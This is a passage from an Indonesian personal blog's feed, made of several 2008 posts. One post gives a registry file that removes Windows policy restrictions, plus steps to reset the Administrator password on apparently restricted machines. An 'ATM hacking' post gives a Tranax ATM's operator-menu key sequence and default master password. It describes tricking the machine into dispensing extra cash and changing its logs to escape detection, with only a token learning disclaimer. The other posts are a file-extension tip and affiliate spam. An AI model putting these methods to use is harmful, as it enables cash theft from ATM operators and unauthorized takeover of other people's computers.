/&gt;"NoPrinterTabs"=dword:00000000&lt;br /&gt;"NoDeletePrinter"=dword:00000000&lt;br /&gt;"NoAddPrinter"=dword:00000000&lt;br /&gt;"NoRun"=dword:00000000&lt;br /&gt;"NoSetFolders"=dword:00000000&lt;br /&gt;"NoSetTaskbar"=dword:00000000&lt;br /&gt;"NoClose"=dword:00000000&lt;br /&gt;"NoViewContextMenu"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]&lt;br /&gt;"DisableRegistryTools"=dword:00000000&lt;br /&gt;"NoDispScrSavPage"=dword:00000000&lt;br /&gt;"NoDispAppearancePage"=dword:00000000&lt;br /&gt;"NoDispSettingsPage"=dword:00000000&lt;br /&gt;"NoAdminPage"=dword:00000000&lt;br /&gt;"NoProfilePage"=dword:00000000&lt;br /&gt;"NoDevMgrPage"=dword:00000000&lt;br /&gt;"NoConfigPage"=dword:0000000&lt;br /&gt;"NoFileSysPage"=dword:00000000&lt;br /&gt;"NoDispCPL"=dword:00000000&lt;br /&gt;"NoDispBackgroundPage"=dword:00000000&lt;br /&gt;"NoVirtMemPage"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]&lt;br /&gt;"NoFileSharingControl"=dword:00000000&lt;br /&gt;"NoPrintSharingControl"=dword:00000000&lt;br /&gt;"NoNetSetup"=dword:00000000&lt;br /&gt;"NoNetSetupIDPage"=dword:00000000&lt;br /&gt;"NoNetSetupSecurityPage"=dword:00000000&lt;br /&gt;"NoEntireNetwork"=dword:00000000&lt;br /&gt;"NoWorkgroupContents"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]&lt;br /&gt;"NoRealMode"=dword:00000000&lt;br /&gt;"Disable"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]&lt;br /&gt;"NoHTMLWallPaper"=dword:00000000&lt;br /&gt;"NoChangingWallPaper"=dword:00000000&lt;br /&gt;"NoCloseDragDropBands"=dword:00000000&lt;br /&gt;"NoMovingBands"=dword:00000000&lt;br /&gt;"NoAddingComponents"=dword:00000000&lt;br /&gt;"NoDeletingComponents"=dword:00000000&lt;br /&gt;"NoEditingComponents"=dword:00000000&lt;br /&gt;"NoClosingComponents"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]&lt;br /&gt;"NoFolderOptions"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]&lt;br /&gt;"DisableCMD"=dword:00000000&lt;br /&gt;"DisableRegistryTools"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]&lt;br /&gt;"Hidden"=dword:00000000&lt;br /&gt;"HideFileExt"=dword:00000000&lt;br /&gt;"ShowSuperHidden"=dword:00000000&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;==&gt; Setelah regedit.exe terbuka baru ubah password administrator &lt;-- (Ini yang di tunggu2x) caranya: C:\Windows\System32\compmgmt.msc &lt;-- double Click  &lt;/span&gt;&lt;span style=""&gt;Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User&lt;br /&gt;&lt;br /&gt;- Klik kanan Administrator -&gt; Set Password&lt;br /&gt;&lt;br /&gt;- Ketik New Password: **********&lt;br /&gt;Confirm Password: **********&lt;br /&gt;&lt;br /&gt;Selesai deh!!!!!!!!!!!!!&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=""&gt;Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu&lt;br /&gt;caranya:&lt;br /&gt;- Masuk ke Folder misalnya: C:/Windows/System32&lt;br /&gt;- Trus klik salah satu file dalam folder itu&lt;br /&gt;misalnya: TaskMgr.exe&lt;br /&gt;- Kemudian klik menu File pada Win Explorer&lt;br /&gt;- Run as...&lt;br /&gt;- Klik The following user -&gt; Masukkan passwordnya&lt;br /&gt;Username: Administrator&lt;br /&gt;Password: ********&lt;br /&gt;- Selesai&lt;br /&gt;NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah&lt;br /&gt;kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara&lt;br /&gt;lain silakan anda temukan sendiri, selamat mencoba&lt;br /&gt;&lt;br /&gt;Contoh lain2nya dibawah ini...........&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Membuka MSConfig dari Windows Explorer&lt;br /&gt;Caranya:&lt;br /&gt;C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe&lt;br /&gt;&lt;br /&gt;2. Membuka Sysedit dari Windows Explorer&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\Sysedit.exe&lt;br /&gt;&lt;br /&gt;3. Membuka Task Manager&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\taskmgr.exe&lt;br /&gt;&lt;br /&gt;4. Membuka Services.msc&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\services.msc&lt;br /&gt;&lt;br /&gt;5. Membuka Disk Management System (Melihat Partisi Harddisk)&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\diskmgmt.msc&lt;br /&gt;&lt;br /&gt;6. Membuka Computer Management Services&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\compmgmt.msc&lt;br /&gt;&lt;br /&gt;7. Membuka Shortcut to desktop&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\Show Desktop&lt;br /&gt;&lt;br /&gt;8. Membuka Defragment&lt;br /&gt;Caranya&lt;br /&gt;C:\Windows\System32\dfrg.msc&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-3520559210466233050?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/3520559210466233050/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=3520559210466233050' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3520559210466233050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3520559210466233050'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/billing-internet.html' title='Billing Internet'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-5149780704297944142</id><published>2008-03-26T21:41:00.001-07:00</published><updated>2008-03-31T20:25:28.427-07:00</updated><title type='text'>ATM hacking</title><content type='html'>&lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Apa itu ATM Machine?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Kepanjangan nya adalah Auto Teller Machine ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Sebuah mesin yang bisa dikatakan sebagai Bank Mini .. Hehehe ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Sebuah mesin yang kayaknya udah gak perlu diceritain lagi deh apa dan bagaimananya, karena saya rasa semua orang sudah tahu mengenai mesin ini ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Yang jelas dengan mesin ini, kalian bisa mengambil duit, tanpa harus pergi ke bank dan melakukan banyak hal lain yang menurut saya pribadi adalah melelahkan .. Ngisi form lah, apalah .. Capek dude xD~~&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Nah, sering kali tuh terjadi rumor .. Bisa gak sih ATM di Hack??!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Gimana sih caranya?? Dalam kesempatan kali ini, saya akan membuat sebuah tutorial dan artikel bersifat informatif singkat berkenaan dengan kemungkinan hacking ATM Machine itu sendiri .. Sebenarnya ada banyak cara, dan kebanyakan cara bisa anda lihat di &lt;/span&gt;&lt;u&gt;&lt;span style=";font-family:Verdana;font-size:10;color:blue;"   &gt;http://www.sate.name&lt;/span&gt;&lt;/u&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt; .. Tapi dalam kesempatan kali ini, saya akan sedikit membahas mengenai masalah teknis yang ada xD~~&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;So .. Lets start the GAME xD~~&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Kalau anda teliti .. Anda bisa mendapatkan sebuah informasi penting dari series yang saya berikan diatas xD~~&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Berikut adalah cuplikan dari Manual Book yang saya baca:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;To access the Operator Function menu, hold the &lt;cancel&gt;, &lt;clear&gt; and &lt;enter&gt; keys simultaneously for 2 seconds, release them and press 1, then press 2, then press 3. The timing of this procedure can be difficult at first.&lt;o:p&gt;&lt;/o:p&gt;&lt;/enter&gt;&lt;/clear&gt;&lt;/cancel&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Jadi intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol &lt;cancel&gt;, &lt;clear&gt; dan &lt;enter&gt; secara bersamaan selama 2 detik, lepaskan mereka, dan tekan tombol 1, kemudian 2, dan 3. Mungkin timing awalnya akan susah pada saat anda mencoba pertama kali .. xD~~&lt;o:p&gt;&lt;/o:p&gt;&lt;/enter&gt;&lt;/clear&gt;&lt;/cancel&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Kalau anda kesulitan untuk login ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Cara kasarnya juga ada .. Wakakaka ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk pada Operator Function ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;st1:place st="on"&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Susah&lt;/span&gt;&lt;/st1:place&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt; memang ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;But no pain .. No gain right?? xD~~&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Setelah masuk ke dalam Operator Function .. Anda akan ditanyai 3 jenis password, yang mana anda dapat memilih 1 dari antara 3 itu:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;- Operator Password (Ini untuk meng-akses menu dasar struktur ATM)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;- Service Password (Mengijinkan akses ke menu dasar dan diagnostic menu)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;- Master Password (Mengijinkan anda mengakses penuh mesin tersebut)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Disini adalah kunci dari pembicaraan kita ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000" (Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Dari &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;sana&lt;/st1:place&gt;&lt;/st1:city&gt; anda bisa melakukan banyak hal ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan hanya me-reduce uang anda sebanyak 100rb sesuai request anda .. Hehehehe ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Menarik bukan??!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Wakakaka ..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Perihal .. Bagaimana apabila kita terlacak??&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi intinya, yang perlu anda takuti adalah .. Security Cameras&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;NB: Tutorial ini hanya dibuat untuk pembelajaran dan pembuktian bahwa ATM Hacking itu mgkn terjadi. Oleh dari karena itu kami tidak membahas jauh lebih men-detail, berikut juga merupakan sebuah bukti bahwa "Lubang" keamanan ini sedang sedemikian rupa di patch oleh pihak Tranax: Baca Disini!!! .. Sekian&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-5149780704297944142?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/5149780704297944142/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=5149780704297944142' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5149780704297944142'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5149780704297944142'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/atn-hacking.html' title='ATM hacking'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-2171888705552419405</id><published>2008-03-26T19:26:00.000-07:00</published><updated>2008-03-26T19:36:19.716-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Menampilkan ekstensi file</title><content type='html'>Ekstensi file dapat dikatakan sebagai pengenal jenis file. Misalnya .doc untuk file MS Word, .cdr untuk Corel Draw, dan sebagainya (lihat juga di sini). Secara default ekstensi file tesebut tidak akan kelihatan. Tetapi Anda bisa menampilkan ekstensi file tersebut sehingga Anda bisa lebih memahami tentang ekstensi file pada Windows Anda. Caranya sebagai berikut :&lt;br /&gt;&lt;br /&gt;  1. Dari Windows Explorer, klik menu View, pilih Folder Options.&lt;br /&gt;  2. Hilangkan tanda check (chenthang) pada bagian Hide file ekstention for known file types untuk menyembunyikan ekstensi file.&lt;br /&gt;  3. Sebaliknya beri tanda check untuk menyembunyikan ekstensi file dan menampilkan ekstensi file hanya untuk file yang tidak diketahui jenisnya.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-2171888705552419405?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/2171888705552419405/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=2171888705552419405' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2171888705552419405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2171888705552419405'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/menampilkan-ekstensi-file.html' title='Menampilkan ekstensi file'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-824154183289038411</id><published>2008-03-26T04:15:00.000-07:00</published><updated>2008-03-27T04:16:14.576-07:00</updated><title type='text'></title><content type='html'>&lt;p&gt;&lt;a href="http://tinyurl.com/2fcjuh"&gt;&lt;img src="http://tinyurl.com/2cc37w" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://tinyurl.com/2fcjuh"&gt;&lt;img src="http://tinyurl.com/298w5c" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://technorati.com/claim/bmu2iyhak6" rel="me"&gt;Technorati Profile&lt;/a&gt;&lt;/p&gt;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://enaq.blogspot.com"&gt;&lt;img src="http://static.technorati.com/pix/fave/btn-fave2.png" alt="Add to Technorati Favorites" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-824154183289038411?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/824154183289038411/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=824154183289038411' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/824154183289038411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/824154183289038411'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/blog-post.html' title=''/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8088323346315680553</id><published>2008-03-26T03:35:00.000-07:00</published><updated>2008-03-26T03:50:51.752-07:00</updated><title type='text'>www.blogdigger.com</title><content type='html'>&lt;a href="http://www.blogdigger.com/" alt="Blogdigger Blog Search Engine"&gt;&lt;img src="http://www.blogdigger.com/images/blogdigger2.gif" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-8088323346315680553?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8088323346315680553/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8088323346315680553' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8088323346315680553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8088323346315680553'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/wwwblogdiggercom_26.html' title='www.blogdigger.com'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7853105819161575084</id><published>2008-03-26T03:18:00.000-07:00</published><updated>2008-03-26T05:02:36.142-07:00</updated><title type='text'></title><content type='html'>&lt;a href="http://enaq.blogspot.com/googlece1b1e8a28ebeb4e.html"&gt;Google&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-7853105819161575084?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7853105819161575084/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7853105819161575084' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7853105819161575084'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7853105819161575084'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/google.html' title=''/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-6437145206992561494</id><published>2008-03-26T00:51:00.001-07:00</published><updated>2008-03-31T20:18:02.785-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Money maker'/><title type='text'></title><content type='html'>&lt;h3 class="post-title entry-title"  style="font-weight: normal; text-align: justify;font-family:georgia;"&gt;Look for MONEY without CAPITAL???Many people will carry out the business am waiting terkumpul him capital.How with you whether like most people???Do you want to do business with without capital OR could money without capital???Many people mensangsikan that.But for you a person netter, that will become the reality.Please PROVE by joining programs is supervised this.&lt;br /&gt;&lt;br /&gt;Make money bisnis online from earn profit earning affiliate programsThere is no doubt that the most successful group amongst online entrepreneurs are affiliates. Few are willing to go public about it but it is widely known that that there are a number of affiliates comfortably raking in hundreds of thousands of dollars in income every year. Actually there is one very powerful advantage that online entrepreneurs involved in affiliate programs have over their counterparts earning from their own ecommerce web sites. And that is the fact that people are usually bound to believe a person referring another web site to them much more easily and quickly than one trying to promote their own site. This coupled with the fact that the Internet is an amazingly powerful referral marketing tool has made the rise of online affiliates phenomenal within such a short time. But there is one major stumbling block that affiliates face today. And that is how to advertise their programs or how to generate enough sales leads. To be successful in any online venture a person needs numerous leads on an ongoing basis, that way they will have a chance of turning as many of them as possible into actual sales. Many affiliates generate leads by finding ways of harvesting email addresses of visitors to their web sites to create an opt-in email list which they then use as leads to refer to their affiliate sites. This is usually done via special links to the sites that identify the particular affiliate through which a visitor arrived at a certain site. The more prosperous affiliates use pay-per-click ads. The effectiveness of these ads is being eroded daily by the increasing number of fraudsters and scum artists who have invaded pay-per-click ads in droves. This has meant that out of the total click-throughs a person receives and has to pay for, an increasingly horrifying percentage are generated by fraudsters who have no intention of buying anything from the advertised web site.&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;  &lt;p&gt;&lt;a href="http://www.getpaidmail.com/pages/index.php?refid=pirates"&gt;&lt;img alt="getpaidmail.com" src="http://www.getpaidmail.com/images/banner5.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.no-minimum.com/pages/index.php?refid=darmatkj"&gt;&lt;img alt="no-minimum.com" src="http://www.no-minimum.com/banners/nomin2.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.sendmoreinfo.com/Id/3105647"&gt;&lt;img src="http://www.sendmoreinfo.com/members/Banner01.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;&lt;h3 class="post-title entry-title"  style="font-weight: normal; text-align: justify;font-family:georgia;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;Beragam cara yang bisa ditempuh untuk mendapatkan dollar dari internet mulai dari baca email, surfing, main game bahkan chatting. Kelihatannya tak masuk akal. Tapi itulah kenyataannya. Yang jadi pertanyaan, dari mana mereka mendapatkan uang untuk membayar kita ? Jawabannya mudah saja. Mereka mendapatkan uang dari perusahaan yang memasang iklan di web atau view bar mereka.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;Biar tidak penasaran Anda bisa mencoba beberapa situs atau program di bawah ini yang diyakini akan membayar kepada anggotanya. Sebagai tambahan, setelah (Anda mendaftar dan) uang Anda telah mencapai jumlah tertentu maka mereka akan mengirimkan &lt;em&gt;bank                                  draft 